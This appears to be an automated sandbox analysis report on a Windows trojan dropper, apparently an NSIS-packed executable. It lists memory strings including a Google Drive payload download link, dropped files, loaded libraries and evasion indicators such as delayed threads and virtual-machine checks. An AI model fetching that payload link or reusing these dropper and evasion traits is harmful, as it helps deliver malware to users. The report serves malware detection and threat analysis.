      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadb
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloade
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadid
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadmL
      Source: nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadnt
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadt
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845952675.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845828650.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 
00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: nRNzqQOQwk.exe, 00000001.00000003.14419575411.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13520406559.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapi
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: nRNzqQOQwk.exe, 00000001.00000003.15128211863.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531873263.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16703975770.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16138447412.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14307119975.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16815816874.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14904620514.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16250138301.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15691986334.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15803735270.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916696761.00000000067FC000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15362687112.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580308822.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14195011644.00000000067F9000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 
00000001.00000003.14786084325.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14792916940.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15915220747.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe Code function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F7
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe Code function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe File created: C:\Windows\Fonts\prelegacy
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe File created: C:\Windows\Fonts\prelegacy\prster
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe Code function: 0_2_00404936 0_2_00404936
      Source: nRNzqQOQwk.exe Static PE information: invalid certificate
      Source: nRNzqQOQwk.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal72.troj.evad.winEXE@3/7@2/2
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004043C3 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043C3
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Program Files (x86)\Fljtenists.iniJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Users\user\slavelivetsJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1A27.tmpJump to behavior
      Source: nRNzqQOQwk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: nRNzqQOQwk.exeVirustotal: Detection: 67%
      Source: nRNzqQOQwk.exeReversingLabs: Detection: 70%
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile read: C:\Users\user\Desktop\nRNzqQOQwk.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"Jump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile written: C:\Program Files (x86)\Fljtenists.iniJump to behavior
      Source: nRNzqQOQwk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000001.00000002.16901286727.0000000002BAB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.13419006132.00000000041CB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI/Special instruction interceptor: Address: 49F8F34
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI/Special instruction interceptor: Address: 33D8F34
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe TID: 6008Thread sleep time: -290000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
      Source: nRNzqQOQwk.exe, 00000001.00000003.15362687112.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13183348229.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474344900.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13191080431.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16480720685.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14195011644.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.0000000006828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3+
      Source: nRNzqQOQwk.exe, 00000001.00000003.15362687112.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13408506429.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13183348229.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13750852480.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474344900.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13632490262.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13191080431.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13526880286.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16480720685.0000000006828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI call chain: ExitProcess graph end nodegraph_0-3797
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI call chain: ExitProcess graph end nodegraph_0-3977
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00402B0E RegOpenKeyExA,RegEnumKeyA,RegEnumKeyA,RegCloseKey,LdrInitializeThunk,RegCloseKey,RegDeleteKeyA,0_2_00402B0E
